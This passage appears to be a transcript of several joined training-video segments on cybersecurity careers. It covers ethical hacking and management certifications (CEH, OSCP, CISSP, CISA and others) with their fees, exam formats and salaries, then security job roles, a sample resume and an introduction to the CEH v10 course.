taken place. So the candidate must have at least 2 years of experience in the information security sector. They need a good understanding of how networks work, how computers work, how operating systems work, how they store data, the location where that data is stored, how databases work, how those databases store those data, and so on and so forth. This certification is sought after mainly in the law enforcement areas, but there are a few corporates that offer forensic investigation as a service, especially when a corporate gets compromised and they want to conduct their own investigations. The certification provider for this is also EC Council, and the exam fees are $500. This is an advanced level certification, so understanding of applications, networks, and operating systems is a must before you attempt this. The exam is quite similar, 150 questions in 4 hours. Again, it's just a multiple choice question exam. The cutoff again is from 60% to 85% depending on the questions and the weightage of each and every question. Job roles: IT security specialist, network security pro. The job roles: forensic investigators, law enforcement agencies, security specialists, homeland security jobs, and your salaries would be around $88,000 and above. Alright, now let's talk about the managerial level certifications. COBIT stands for Control Objectives for Information and Related Technologies. It's a certification that will give a candidate an in-depth knowledge of the framework which COBIT is all about, and the framework helps you manage and govern enterprise IT environments. Now this is advanced certification, so around 8 years of managerial experience is suggested before you attempt the COBIT 5 certification to understand all the aspects and to help you implement the framework properly. The certification certificate provider is ISACA. The exam fee is around $175. Now this is a small exam, 50 questions, but in 40 minutes. So you really have to be on your toes. You have to know the knowledge. There's very limited time to think, and you have to be fast in your answers. The pass percentage is 50%. The job roles associated with this certification would be to when you apply for information security manager or as a security consultant or a cybersecurity manager, and your roles and responsibilities would be to govern the IT space that the organization owns. So all the servers, desktops, the network, the data flows, the databases, everything, and how it needs to be managed and how it needs to be governed in a secure manner. Annual salaries would be around $100,000 plus. Then the CISM, also called as CISM. It stands for Certified Information Security Manager, and as the name suggests, it's a security manager certification. It helps the candidate in understanding the relationship between business goals and information security. So now you're going into the space where you're not only technical in nature, but you also have to understand the business needs, the goals of the business, and you have to align the information security of your infrastructure along with the business needs and the business goals. So it is your inputs that are going to go to the management to see if the infrastructure is aligned to the business goals or if the infrastructure or the business goals need any fine-tuning. Around 5 years of work experience is recommended in the information security field for attempting the CISM. Out of the 5 years, the candidate must have a background as an information security manager for 3 years. So you have some experience as a manager, you have implemented those things yourselves, which will give you a better understanding, and then you attempt the certification. Again, providing by ISACA, and the exam fees for ISACA members is $575. For non-members, it is $760. The exam is where you have to answer 150 questions in 4 hours. Quite a bit of time, but questions are going to be scenario-based questions where they're going to give you a lot of scenarios. You have to think about it and you have to give the most probable and the correct answer for that particular scenario. The pass mark is 450 out of 800. Your job profiles would be either a risk manager or a risk consultant, analyzing the business requirements to the infrastructure security that you have, and to identify if there are any risks associated with the infrastructure, highlight those risks, and then put in security controls and manage those controls in a way where security is mitigated. Your average salaries would be around $88,000 and above. Then the CISA or the CISA, the Certified Information Systems Auditor certification. It not only looks into security, but it also looks into auditing and controls in information systems. This is a highly reputed certificate and you gain a better understanding of governance, regulations, and auditing your information landscape. Again, a minimum of 5 years of work experience in the field of information systems, auditing, control, or security is necessary. Now here the question would be, what's the difference? Security is where you're technical in nature, you have done, let's say, a vulnerability assessment or a penetration test, you have implemented firewalls, you have architected security. Controls are all about the security controls that you're going to implement, like firewalls, IDSS, IPSS, data loss prevention systems, maybe even UTMs and whatnot. So experience in architecting or implementing those controls in an effective manner, mitigating your security or your vulnerabilities that you have identified in the organization. And auditing would basically mean about looking at compliance to ensure that everything is in place, you're compliant with, let's say, ISO 27001 guidelines or the policies that you have created yourself, and everything is working in order. So it's more of a checklist where you're going to just check everything is in place and you're conforming to standards. This certification is also provided by ISACA, and the exam fees for ISACA members are $575, whereas non-ISACA members will have to pay $760 for the certification. 150 questions again in 4 hours, multiple choice questions, scenario based. So you have to really understand this real world scenarios of what controls and what audit mechanisms should be in place. Pass mark is 450 out of 800. Your job roles would be mainly becoming an auditor or a senior auditor, a director for information security, information audit manager, or an information technology consultant, where you provide intelligence on how the company should implement their infrastructure. Average salaries would be 103,000 and above. Then comes the CRISC, also called as CRISC, Certified in Risk and Information Systems Control. Certification helps the candidate design and maintain information systems controls for an organization. This is one of the most sought after certifications as far as risk management is concerned. In Europe and in US, if you have this kind of certifications, you automatically qualify for a risk manager or a security risk manager or a information security consultant kind of a role. You should have a minimum of 3 years of experience in the field of IS controls. That means information security controls. You should have knowledge about firewalls. You should know about how to mitigate risks, how to identify risks in the first place, risk analysis, risk management, and after which you're going to implement security controls to mitigate that risk or bring it to acceptable levels. At this point in time, you will also be responsible to create policies revolving those risks and how you want to calculate those risks and treat those risks in their lifetime. Certificate provider again is ISACA, $575 for ISACA members, $760 for non-ISACA members for the exam fees. A similar question, 150 questions to be answered in 4 hours, multiple choice based on performances. So they may give you a scenario where you have to perform a risk analysis and provide a report and a solution based on your findings. Again, the pass mark is 450 out of 800. The job profiles associated, as discussed earlier, are the IT risk management professionals, where they're going to identify risks, treat those risks, calculate, analyze, maybe do a business impact analysis to ascertain how the organization is going to be affected. And then you will also be looking at compliances as far as these job roles are concerned. Average annual salary would be 119,000 and above. Moving on to advanced level certification. Now, this is where we come across the CISSP or the CISP certification, Certified Information Systems Security Professional. This is the gold standard of all certifications. If you have this certificate, you can basically be assured of a job in the IT world. Now, just to qualify, you'll have to have 5 years of experience in the information security field. There are 8 domains that are specified by CISSP, and you have to prove that you have knowledge and you have work experience of around 5 years in at least 2 of those domains. If you do not have those kind of experiences, you can still attempt the exam, but you become an associate of ISC Square, which means that you get 6 years to accomplish the 5 years of experience requirement for this certification. Before taking up the CISP certification, it is suggested that the candidate clears all the intermediate level certifications. Not all, but some of them. In fact, I have seen people do the other way around. They qualify for CISSP, they give the exam. Once you're CISSP, the CISA or CISM, CISE or CISM exams are way easier to crack. But you need to have that kind of experience. I have seen people with 15 years of experience and more fail at this certification in the first attempt. The certificate provider is ISC Square. The exam fees is $699. Like I said, this certification is most sought after, the gold standard. In fact, there is hardly any other certifications after this that you might want to do. The questions, now the exam has changed. If it is the English version that you're giving, it's 150 questions to be answered in 3 hours. If it is the non-English exam that you're attempting, then it is 250 questions in 6 hours. It's a marathon, and if you're opting for the 6-hour exam, you need to plan it really well. It sounds really easy, but the questions are quite tough. They're scenario based and the answers are quite confusing as well. You would get multiple choice questions, you would get drag and drop, and you might get simulators as well. The pass mark is 700 out of 1000, but each question has a different weightage. So it depends on which questions are asked of you and which questions you have answered correctly. The job roles associated with this certification would be anything and everything in information security at the managerial level and above. So information security manager, risk manager, information system security officer, the CISO role, the CISO, chief information security officer. Any role that you might think of as a risk from a risk compliance strategy could be achievable after this kind of a certification. The average annual salary is $108,000 for this certification. So let's start looking at the certifications.
So, to be an ethical hacker, you must hold a certification which specializes in ethical hacking or in cybersecurity. Companies look for candidates who are globally certified. When we say globally certified, they're looking for a certificate that has been given by an organization that is recognized globally and is well accepted in the industry. So, these are the top 5 certifications a candidate can obtain. The first one, become a certified ethical hacker. Then there is Global Information Assurance Certification Penetration Tester. Then Offensive Security Certified Professional, CompTIA Pen Test Plus. And finally, the Licensed Penetration Tester. Now, these certifications are offered by different organizations. All of these organizations are recognized globally and their certifications are well accepted in the technical space. So let's start off with the Certified Ethical Hacker and we'll look at the organizations that provide these certifications and how we can attain them. So CEH, or Certified Ethical Hacker, in its current form is in its version 10. It's been revised and updated over a period of time. EC Council is the certifying authority for CEH. They have their own authorized training centers through which you can attend trainings, give those exams, get yourself certified, and thus become globally certified and can be eligible to apply for security related jobs. It is a very well-known certification and is widely accepted at the same time. It would test the candidate's knowledge of security threats and preventive measures. Now, there are 2 types of exams that you can give with CEH. One is a multiple choice question exam, which is theoretical in nature. They ask you questions and you answer the correct one. You select the correct answers. If you clear, you get certified. The second certification nowadays is where there's a practical exam associated with it. That's you'll have to purchase the voucher for that exam and give that exam. The practical exam is held in a virtual lab where you're given scenarios, and based on those scenarios, you have to resolve the questions given to you and give proof of the resolution, which would then get you certified as an ethical hacker. The theoretical exam in this scenario is the fees is around $500. This is for the multiple choice question exam where you can pay the fees and you can attend through a online portal and you can give the exam directly. The exam is 4 hours long in which you have to answer 125 questions. Now 4 hours for 125 questions seems a long time, but it isn't. It's a very technical exam. There are scenario based questions and it would take some time for you to analyze and understand the question and then identify the equivalent correct answer. So it's a very competitive exam and you'll have to study really hard to clear this exam as well. The cutoff for passing varies from 60 to 85%. So there is no exact grade and all the questions have different weightages. So depending on the questions that have been given to you and the way that you have answered them, you would pass at either 60% or you would pass when you've scored 85%. Once you are CEH certified, which is a very technical certification, you will be qualified to apply for job roles as a penetration tester or a security engineer. These are job roles where you would be responsible of ethically trying to attack applications, servers, switches, and try to find out vulnerabilities within them. The training of this certification will make you adept in most of these tools that are required. There are a lot of practicals in this training, and if you successfully completed those practicals, clearing the exam is a easy task. With the practicals comes your knowledge and would help you understand how you would be performing penetration tests in the real world. An average annual salary in the USA for a CEH certified person is around $91,000 and in India is around 4,76,000 odd rupees. The salaries would vary as far as organizations are concerned. More established organizations can afford to pay a little bit more, but these are average salaries that we have seen across the market. The next certification is the GPEN, also known as the Global Information Assurance Certification Penetration Tester. This certification looks into the different pen testing practices and methods, also focuses on the various problems and pen testing. So again, this is where you're getting certified as a penetration tester. So it's again a technical certification where your knowledge on networking, applications, and security of which will be tested. You will be trained on this, of course. So the training will include all these areas where you need to focus, identify those problems, and thus be ready for the real world scenarios. The candidate will have to understand networking concepts and operating systems such as Linux and Windows, and you should be very well aware of the TCP/IP protocols. This is true for any of the technical certifications for ethical hacking. GIAC is the certification provider. It's again a very well-renowned and well-accepted certification authority across the globe. The exam fees are $1,899. 82 to 115 questions to be answered in 3 hours. Now, why 82 to 115? It depends on the test that has been associated, and depending on how you're answering those questions, you would be given those many number of questions to begin with. But all of these need to be answered in 3 hours. 74% is the pass percentage that is required to clear this exam. The average annual salary in the USA is around $96,000, while in India it is around similar to certified ethical hacking. Then looking at the next certification from Offensive Security called the OSCP, Offensive Security Certified Professional. This is another penetration testing certification, highly technical in nature, and it is an entirely hands-on certification. The previous two certifications that we saw, we talked about CEH, where there are two different exams. You could either take the theoretical exam and give your MCQs, or you could take the practical one. Here you don't have an option. This is a practical exam. So the test is conducted on a virtual network. So they send out instructions to you. There's a virtual lab that is given out to you, and they give you the questions, and you have to perform those assessments, create those reports, and provide it to the certifying authority, in this case Offensive Security. If you match their criteria of whatever you have identified in those reports, you get certified. Here, the requirements of good understanding of networking protocols, how systems function, how Kali Linux operating system functions, and the candidate must complete Offensive Security's penetration testing with the Kali Linux course and pass the hands-on exam. So this focuses purely on Kali Linux. Kali Linux is an operating system that is freely distributed over the internet and comes structured with around 300 plus tools used for ethical hacking. So this course totally relies on Kali Linux for you to use as a tool set for penetration testing. The certificate provider, as stated, is Offensive Security. The name of the course is OSCP, Offensive Security Certified Professional. Exam is around $800 to $1,550. Now understand that this exam is technical and is hands-on. So for you to prepare for this exam, they come up with virtual labs where you can start practicing and honing your skills. Depending on the number of days for which you have purchased the access to that particular labs, the amount will vary from $800, which would be the minimum access days available, to $1,550, where the maximum number of days would be given to you for practicing. Once you're ready, even during the time span of where you have that access, once you're ready for the exam, you can attempt the exam and clear. The average annual salary is similar, around $91,000 for the US market and 905,000 rupees in the Indian market. Then looking at the CompTIA Pen Test Plus. CompTIA is another certification authority or a certification provider, a training provider that will help you get yourself certified in the ethical hacking space. So they have certification called Pen Test Plus, which is focused towards penetration testing. So it is an intermediate level certification. It assesses the vulnerability assessment and the penetration testing skills of a candidate. Here, the training will provide you with all the essentials, where it will help you identify how to do vulnerability assessments, how to identify those vulnerabilities, and then which tools to utilize for what kind of a penetration test. For the requirements, a minimum of 3 to 4 years of hands-on experience in the information security field. Also, a CompTIA Security Plus or a Network Plus or equivalent knowledge is required. So in the Network Plus, they talk about securing networks, and they help you understand the OSI layers, the TCP/IP layers, and help you understand the protocols and all of those things. So having that knowledge is an added advantage. The certificate provider is CompTIA, and the cost of the exam is around $349. Maximum number of questions is 85, and I think it's a 3-hour exam. The passing percentage is scoring 750 marks out of a possible 900. So the scale is, the minimum you can ever score is 100. If you're completely unprepared, the maximum you can score is 900. You get a leeway of 150 marks for your certifications. So you have to score a minimum of 750 to clear the exam. Average annual salary for a CompTIA Certified Penetration Test Plus professional is $97,000 in the US market, and in the Indian market it would be around 5 lakh rupees. Then comes the License Penetration Tester. Now this is an advanced certificate again from EC Council. This is where EC Council gives you a license which certifies that you have undergone thorough training and have cleared your exam in which you can conduct or lead an audit for vulnerability assessment and penetration testing. It is an expert level certification, comes after the CEH certification. It is the ultimate test which tests the candidate's penetration testing skills. So there are two certifications over here. One is the ECSA, EC Council Certified Security Analyst. Once you clear that, you can appear for the Licensed Penetration Tester. Both of these are hands-on certifications. So you will be given a virtual lab, you will be given a scenario in which you'll have to perform some assessments, create reports, submit it to the EC Council. They will analyze your reports. If they meet the criteria that have been identified, you would then be certified as a licensed penetration tester. The candidate must be above 18 years of age. A recertification is required every 3 years. So the validity is 3 years. After 3 years, you will have to be recertified, or there is a continuing point education system over there where you can score points by publishing articles, by attending trainings or giving out trainings, and you can get yourself recertified. It is preferred that the candidate has CEH and the ECSA certification. So the previous certification that we saw, Certified Ethical Hacker, and then the ECSA, EC Council Certified Security Analyst, after which you can appear for the LPT, License Penetration Tester. The certificate provider again is EC Council. The License Penetration Tester exam has a different process. The candidate must purchase an exam dashboard for $899, which is valid for a year. So once you purchase the voucher, the validity is 1 year. You can prepare within that 1 year and then give the exam and attain the certification. Only once you are ready, the exam can be scheduled and you can give that exam. The exam consists of 3 different levels. Each level has 3 different challenges. The candidate must pass at least 1 challenge in order to qualify for the next level. And for each level, the exam is 6 hours. So this is a grueling exam. This is hands-on. They're giving you challenges and they are going to test you on your skills as a penetration tester. So be ready to be very hands-on for this kind of a certification. Average annual salary in the US is around $100,000 and above, and in India, $825,000 and above.
In today's world, data is generated and exchanged at a high speed. Did you know that 2.5 quintillion bytes of data are generated every day? Companies all over the world make crucial decisions by analyzing all of this data. With the rise of data, there has been a tremendous increase in the number of cybercrimes across the globe. To prevent cyber attacks, cybersecurity is implemented. So what is cybersecurity? It is nothing but the practice of protecting networks, programs, computer systems, and their components from unauthorized digital access. As mentioned earlier, companies rely on data and it is required that the data is not compromised or stolen. To do this job, we have various cybersecurity professionals who are skilled to protect data from cyber attacks. There has been a sky-high growth in the number of cybersecurity jobs. This growth will only double in the near future, as companies will always be on the lookout for skilled professionals who can protect the confidentiality of the data. So now that we know why cybersecurity jobs are important, let us have a look at the various cybersecurity job roles. There are various kinds of cybersecurity job roles. Let's go through few of the top paying job roles. Going in the descending order of the salary structures in the USA, we first have the Chief Information Security Officer job role, followed by the Security Architect, Penetration Tester. Then we have Cybersecurity Engineer, Malware Analyst, and finally we will look into the Computer Forensic Analyst job role. I will now brief you about each of these job roles individually and look into their responsibilities, skills, and salary structures both in the USA and in India. So let's start off with Chief Information Security Officer. A CISO is a senior level officer in any organization. He is entrusted with the safety of the data in an organization. A CISO has various responsibilities. They are required to develop, implement, and maintain an organization's security and risk management program. They also communicate with their organization stakeholders and brief them about various information-related security concerns. By doing so, they are able to implement a better security system for an organization. At times, a CISO would have to also recruit an IT team's members. They need to make sure that the candidate is knowledgeable and skilled. A company's risk and vulnerabilities have to be predicted beforehand. Prediction of such risks and vulnerabilities are taken care of by a CISO. They play a major role in preventing cyber attacks in any organization. Let's now look at the different skills required to be a Chief Information Security Officer. First and foremost, a candidate must have good communication and presentation skills. This is very important for any organization. A degree in computer science along with an MBA is a preferred qualification. MBA is not mandatory, but there is an added advantage if the candidate has an MBA along with a computer science degree. The candidate must be good at handling security breaches. It is preferred that the candidate has prior experience of handling a security breach and who is also good with incident management. Many employers prefer candidates who have global certifications. To become a Chief Information Security Officer, the preferred certifications are CISM, that is Certified Information Security Manager, and Certified Information System Security Professional, CISSP. If a candidate has either of these certifications, they have a better chance of getting a job as a Chief Information Security Officer. Let's now move on to their salary structures. A CISO earns nearly $180,000 in the USA. In India, the salary is nearly 25 lakhs per annum. That's a lot of money. So these were the responsibilities, skills, and the salary structure of a Chief Information Security Officer. Let's move on to our next role. Our next role is that of a security architect. A security architect maintains the security of an organization's computer systems. They prevent the computer systems from malware attacks. Let's look into their responsibilities. First and foremost, our security architect identifies weak spots in a system by performing vulnerability tests. These tests are carried out on a regular basis. Along with vulnerability tests, risk analysis and security assessments are also done by a security architect. Installation of routers, VPN and firewalls are approved by a security architect. These devices are very important when it comes to the security of an information system. Well, a security architect rightly approves the installation of these devices. Digital signatures and public key infrastructures are designed. In addition to all the above responsibilities, a security architect also provides technical assistance and guidance to the other security team members. Let's now move on to the skills required to be a security architect. First and foremost, the candidate must have a computer science or an information technology degree. Coming to the experience, the candidate must have an experience in the field of risk management, as the role of a security architect is a lot to do with managing risks. Understanding of the network basics and various security protocols along with cryptography is required to be a good security architect. Lastly, the preferred certification to become a security architect is that of a CISSP, which is Certified Information System Security Professional. As mentioned earlier, this is only a preferred certification. A candidate who has this certification has a higher chance of bagging a security architect job. Let's now look into the different salary structures in the USA and in India. In the USA, a security architect earns nearly $123,000 per annum. In India, a security architect earns nearly 20 lakhs per annum. So that's all about security architect. Let's now move on to our next role, that is penetration tester. A penetration tester, also known as an ethical hacker, is a cybersecurity professional who tries to exploit a security system's vulnerabilities just like how a hacker would do. A penetration tester mimics the role of a hacker. Let's look into the various responsibilities of a penetration tester. As the name suggests, a penetration tester needs to perform penetration tests to discover and identify vulnerabilities in a system. In addition to this, they are also responsible for designing new penetration tools. All the penetration tests results are documented, and based on the document, new security measures are discussed with the other IT team and the management. A penetration tester performs tests by developing codes, and they also conduct security audits which help them understand the vulnerabilities in a system. Let's now look into the different skills required to be a penetration tester. A candidate must have 1 to 4 years of experience in the information security field. Knowledge of Windows, Linux, Unix operating systems is required. Also, the candidate must know C and C++. Languages such as Java, PHP, and Perl are preferred by employers, but not a requirement. To successfully bag the position of a penetration tester, the preferred certifications are Certified Ethical Hacker, that is CH, and Certified Expert Penetration Tester, that is CEPT. Let's look into the salary structures of a penetration tester. In the USA, a penetration tester earns nearly $117,000 per annum. And in India, a penetration tester makes nearly 4 lakh rupees per annum. So those were the responsibilities, skills, and salary structures of a penetration tester. Let's now move on to our next job role, that is cybersecurity engineer. On the whole, a cybersecurity engineer protects an organization's network and its data. They also plan security measures to prevent an organization from cyber attack. Let's look into the responsibilities of a cybersecurity engineer. They design cybersecurity platforms for a company. They are also responsible for planning and implementing cybersecurity measures. Well, a cybersecurity engineer solely designs, plans, maintains, and implements security measures in an organization. They are also required to report and communicate with the other teams in an organization. A cybersecurity engineer is different from a network security engineer. While a network security engineer looks into the troubleshooting, a cybersecurity engineer looks into the prevention of cyber attacks. Let's look into the skills required to become a cybersecurity engineer. Just like the other job profiles, a degree in computer science or information technology is a must. Well, 2 years of experience in the relevant field is required to become a cybersecurity engineer. A cybersecurity engineer is needed to design security systems. Hence, a candidate with a good problem-solving skill is required. Along with good problem-solving skills, the candidate must also be good with networking skills. As mentioned earlier, knowledge of C and C++ is a must. Java and Python knowledge is preferred to be a cybersecurity engineer. Moving on to the salary, a cybersecurity engineer earns nearly $96,000 in the USA. Whereas in India, a cybersecurity engineer earns nearly 7 lakh rupees per annum. Moving on to our next job role, that is malware analyst. As the name suggests, a malware analyst is one who identifies various cyber threats such as worms, viruses, trojans, bots to understand their nature. A malware analyst is skilled at analyzing the different malware threats in a system. Let's now look into a malware analyst's responsibilities. They are responsible to identify threats, and once they identify, they are supposed to document the methods to avoid such malware threats. They also research and develop malware protection tools. Various malware protection tools are developed by malware analysts so that the next time a cyber threat occurs, they are able to easily identify. In addition to the above responsibilities, a malware analyst is also responsible to constantly be updated with the new malware threats. Moving to the skills required, a candidate must know Windows, Linux, Unix operating systems, and knowledge of C and C++ is a must. Usage of tools like IDA Pro, OllyDBG, RegShot, and TCP View is suggested. Having a GIAC reverse engineering malware certification is a plus point. The certification is only a preferred certification. It is not a must that the candidate must possess this certification. Moving on to the salary structure, a malware analyst earns nearly $80,000 in the USA and earns nearly rupees 6 lakhs per annum in India. So those were the skills, responsibilities, and salary structure of a malware analyst. Let's move on to our last job role, that is computer forensic analyst. Previously, we have seen the job roles wherein they try to protect a company from a cyber attack. In this role, we will see how a computer forensic analyst works after a cyber attack. A computer forensic analyst works on cases following an attack. They collect digital evidences to retrieve information. Let's look into their responsibilities. With the help of various investigation tools, a computer forensic analyst gathers evidences from a system which was a victim of a cyber attack. Their main responsibility lies in recovering deleted, manipulated, or stolen data. A computer forensic analyst helps various officials in investigating a case by discovering evidences from data which was manipulated or compromised. There have been a lot of cases where a computer forensic analyst has come to the rescue of the police department. Moving on to the skills, the candidate must hold a bachelor's degree and work experience in the related field is required. For the post of a computer forensic analyst, it is not necessary that the candidate must hold a computer science degree, but the candidate must have relevant work experience. A candidate must have knowledge of networking, law, and criminal investigation, as they have to do a lot with investigating cases as well. A sound analytical mind is critical as they have to analyze data and arrive at conclusions as to identify the cybercriminals. The preferred certifications to become a computer forensic analyst are Certified Forensic Computer Examiner, that is CFCE, and Certified Computer Examiner, that is CCE. Well, these were the skill sets required to become a computer forensic analyst. Moving on to the salary structures. A computer forensic analyst earns nearly $71,000 in the USA. And in India, a computer forensic analyst earns nearly 8 lakh rupees per annum. That was all about computer forensic analyst. Well, those were the 6 top paid jobs in the field of cybersecurity. Now, I will run you through a sample resume of a cybersecurity engineer. This is only a sample resume of a cybersecurity engineer. You can alter it according to your own preference. Here, we first start off with the name and your email ID and phone number. Then a quick summary about yourself and what you're good at and what you are looking for in an organization. After which you can give your LinkedIn profile link and your GitHub profile link if you have one. Moving on to the experience. Here you would have to give the company's name and the tenure. Ideally for a cybersecurity engineer, the minimum number of years required is 2. And below that, you can write the different responsibilities that were taken care by you in your previous organization. TCP/IP network administration and security monitoring are 2 important responsibilities that any cybersecurity engineer must have on their resume. It is great if you have configured firewalls and IDs as well. Underneath that, you can mention the education, and it is required that you have a degree in computer science or in information technology. You can then mention your university and your GPA. Moving on to the skills. We have technical skills and non-technical skills here. Under technical skills, you would have to write the languages that are known to you. For example, C, C++, which is a must. Java and Python are preferred too. Knowledge of Windows, Linux, and Unix operating systems will also have to be on your resume if you're applying for a post of a cybersecurity engineer. The other skills depend from person to person. Here I have IDS and IPS penetration vulnerability testing, encryption technologies, knowledge of SQL, and at the end you can also write the certifications. Ideally, a cybersecurity engineer must have CCNA, CCNP certifications. In addition to it, even a CompTIA Plus certification is preferred. Moving on to the non-technical skills, here you can mention the languages that you're good at, the different competitions that you have participated in. It can also have your co-curricular activities, and anything to do with problem solving would also be an added advantage.
Now let's begin with who is a certified ethical hacker. A certified ethical hacker is a person who's also known as an ethical hacker. An ethical hacker is just the opposite of an hacker. A hacker is a person who with malicious intent tries to misuse vulnerabilities that they have identified in an organization structure and then gain access to unauthorized data. Whereas an ethical hacker does the same thing. They try to locate the weakness, they try to locate the vulnerabilities, and they see how they can be misused. However, the intent is completely different. And that is what differentiates a hacker from an ethical hacker. Hacker would be a criminal with a malicious intent who would try to misuse and personally gain by doing criminal activity from that particular activity that they have done. Whereas an ethical hacker would try to help the organization in an authorized manner. So that's where the permission comes into the picture. The ethical hacker has permission from the organization to conduct some activity that would identify vulnerabilities or weaknesses in the information technology structure of that organization. And then once they have been identified, the ethical hacker would then help the organization to plug those vulnerabilities rather than misuse those vulnerabilities. So any person who completes CEH version 10 certification is known as a certified ethical hacker. So there's a certification. Once you complete that, once you pass the exams, you can essentially call yourself as a certified ethical hacker, and you're going to get a certificate with the same terminology. So as you can see in the diagram, your responsibility would be as a certified ethical hacker would be with the proper permission of the organization, with the authorization coming in, with contracts coming in, you would legally help the organization to identify those weaknesses and vulnerabilities. And once you find them, you're going to report them to the organization, and you're going to help the organization with remediation plan, which would help them remediate, mitigate, and resolve the vulnerabilities that you have identified, thus making the organization's security structure a lot better, based on which black hat hackers or malicious hackers would be unable to attack the organization. So what is CEH version 10? Now this course was initially introduced in September 2015, and I think if you look at the versioning, this is the 10th version that is there in the market. So essentially CEH, or the Certified Ethical Hacking course, as the course itself, has been for a long time in the industry. It's a very well accepted course, and it's a well renowned course. The current version as it is was introduced in September 2015 and is one of the toughest certifications in the cybersecurity field. This includes a lot of information that you have to learn, that you have to know before you can attempt the certification. You will master all ethical hacking methodologies that are used in penetration testing and ethical hacking situations. What does that mean? That means that CEH version 10 is a structured course that will help you look at all the phases that are used in ethical hacking, all the terminologies that are utilized, all the tools that are utilized in such a manner that you can penetration test or a vulnerability assessment and identify and test the vulnerabilities for their complexity. And this course, once you complete the course, you would have mastered all the ethical hacking techniques that are required. There are two exams. One is a written exam and the other is a practical exam. Now you can opt for either or. The written exam is basically a multiple choice question exam where they'll ask you scenario based questions and you have to answer those questions. That is something that we're going to look into during this video. The practical exam is basically a simulation exam where they give you a scenario and you have to complete those tests and prove that you are a good ethical hacker. Based on the report that you give, if the report tallies to what the test was, you would be clearing that exam. So practical exam is a little bit tougher. It's more hands-on. It tests the actual skills that you would perform in a hacking scenario or a ethical hacking scenario. Thus the practical exam going to be that much tougher. The written exam, to give it credence, tests you a lot on your mentality, on your thought process, on your judgment characteristics. So they will give you a scenario and ask you what do you think is happening, what does this attack tantamount to, or what would be the next step in the particular attack that they're describing. Thus it's more of an intellectual test where when your thought processes are being checked and you are giving those exams. So what would be the difference between these exams? In a practical exam, you would be conducting all those steps yourself and you would be reaching a conclusion. So here essentially you're being tested on the skills that you have developed on the execution part of it and to see whether you can execute a test end to end. Whereas in a written exam, you would be put in the middle of a test where you have to assume something, where you have to understand what the steps would have been performed in the previous steps and what would be the expected result, and you're supposed to analyze that and then come to the correct answer. So if there is a question which exam is better, written or practical, the answer to that is from an intellectual perspective, a written exam would be a lot tougher than a practical exam, and from an execution perspective, a practical exam would be tougher than a written exam. So it depends on us which exam we want to give. Both of them are widely accepted and well respected in the information security field. So it's just the option that we choose which exam we want to give. Now, this course, the version 10 course, is purely attack based course. Okay, it is an offensive course. There is no defensive mechanisms. So if you're looking for questions of how to secure yourself on the internet, how to securely configure an operating system, or how to securely configure a server, how to configure a firewall, this is not the certification. This basically talks about attacking those devices. So if you come across a firewall, how would you test a firewall? How would you identify vulnerabilities in those? And how would you bypass a firewall? Similarly, if you come across a server, how are you going to attack and hack the server? Let it be Windows or Linux based. So this basically becomes an attack based course. You're looking at offensive mechanisms over here and not defensive ones at all. So what's new in this version? In this version, there's a new module for IoT, Internet of Things. It focuses on emerging attacks, vectors like cloud, artificial intelligence, and machine learning. It basically talks about smart devices. And it talks about the vulnerabilities, the risks that the smart devices face in today's world. For example, it will tell you about the industries that are utilizing all these smart devices, why are they utilizing it for, what kind of devices they are utilizing, and what are the risks within those devices. It will also give you a lot of tools for you to practice upon to identify such IoT devices. What would constitute an IoT or an Internet of Things device? Any device which has an IP address and can connect to the internet and create data. So even your smartwatch, your smartphone, your cars that have internet connectivity nowadays, your Google Homes, Amazon Alexas, all of these devices would come under the IoT umbrella. And have you ever wondered about sitting at home, having a Wi-Fi, having all of these devices, even a smart TV, if you will, connected to the Wi-Fi? And have you ever questioned how a hacker would then be able to access your home through all of these devices, record information, and basically just spy on you? Similarly, an organization where they are utilizing IoT, they would be vulnerable for the same vulnerabilities. And this course does include IoT security to a certain extent, where we talk about vulnerabilities and how to identify those vulnerabilities in IoT. Then there's a new vulnerability analysis module where it gives you risk assessment. It talks about CVSS scoring systems. It talks about how to do a vulnerability management program in the first place. What are the steps required in a vulnerability management program? How should it be repeatable and how it should be measurable as a program? And what should be the outcome? So basically, it will give you a structured way of how to do a vulnerability management assessment and how do you want to achieve the end goal, thus leading you to a penetration test. So all the modules are leveled up. What do you mean by leveled up? That means they've been updated to the latest tools, latest standards, latest technologies. So you've got cryptographic attacks, you have got attacks on applications like SQL injection, we'll be talking about packet sniffing using various tools. All of these are upgraded, which means they are up to the latest operating system. So even when we do this course, you'll be looking at operating systems like Windows 10, Windows 8, Windows Server 2012, Windows Server 2016, Kali Linux machines, Android machines, and Ubuntu desktop as well. So all of the operating systems are latest, the tools are latest, and you will be interacting with these tools. And then there's a mobile security toolkit as well, which will help you do a penetration test on a mobile device. So these are what is new in version 10. Now let's talk about the roles and responsibilities that an ethical hacker should have when they actually go into the world. Now, what are the responsibilities, roles, what are the capabilities that we should have? That we should be able to look at scripts that would test for vulnerabilities. So for example, a SQL injection attack, it's a script-based attack. Let's say a cross-site scripting attack, that is again going to be a script-based attack. So we maybe we want to go ahead a little bit, look at Windows systems and do a PowerShell attack and know about PowerShell scripting a little bit. If you look at Linux Windows, there's a bash shell where there's bash scripting and you'll want to learn that scripting as well. Now the course doesn't include all these scripting languages. It does help you understand what these scripting languages are, and it does have some basic introduction to how these languages can be utilized to create those scripts. Then we also want to develop tools to increase security. You want to look at those commands that are utilized on all operating systems. You want to look at the capabilities of the operating systems, of how to create security parameters and ensure the operating systems and applications devices are secure. You should be able to perform risk assessment. Now, when you say risk assessment is the likelihood of an attack being actually executed on an organization based on the threats and the vulnerabilities that we have identified. So risk assessment is something that you find out a vulnerability and then you try to figure out in a hypothetical manner of what is the likelihood of that vulnerability being exploited by a hacker if they find that vulnerability. And if they do execute that, what is the impact that is going to happen on the organization, and what is the penalties or the repercussions that the organization is going to face if that vulnerability is exploited. That's what a risk assessment is. Then we should also be able to develop security policies or set up security policies and implement them to ensure that the security mechanisms are standardized and are consistent. And then we should also look at training staff for network security to ensure that they are aware of these vulnerabilities and they know what their responsibilities are to maintain some semblance of security in the organization. So why do we want to become a certified ethical hacker? Now, since you're watching this video, it's easy to assume that we all are interested in security, we all are interested in hacking, but hacking is not a real job. For us to get a job in the industry on a security parameter or information security parameter, we want to become a certified ethical hacker. So if you look at the popular hacking cases that have happened, In 1990s, there was a national crackdown on criminals. Microsoft NT operating system was hacked. Now, this was back in the 90s when security wasn't that much evolved. And there were a lot of attacks back then that crippled infrastructure, that crippled banks, when they started realizing that computing isn't as easy as it seems. Of course, if you use a computer, the functionality is always there. But if the functionality is not properly configured, you're just exposing yourself to cyber criminals where they're going to steal information, and your organization may just go bankrupt because of that. In 2013, an example, Adobe reported 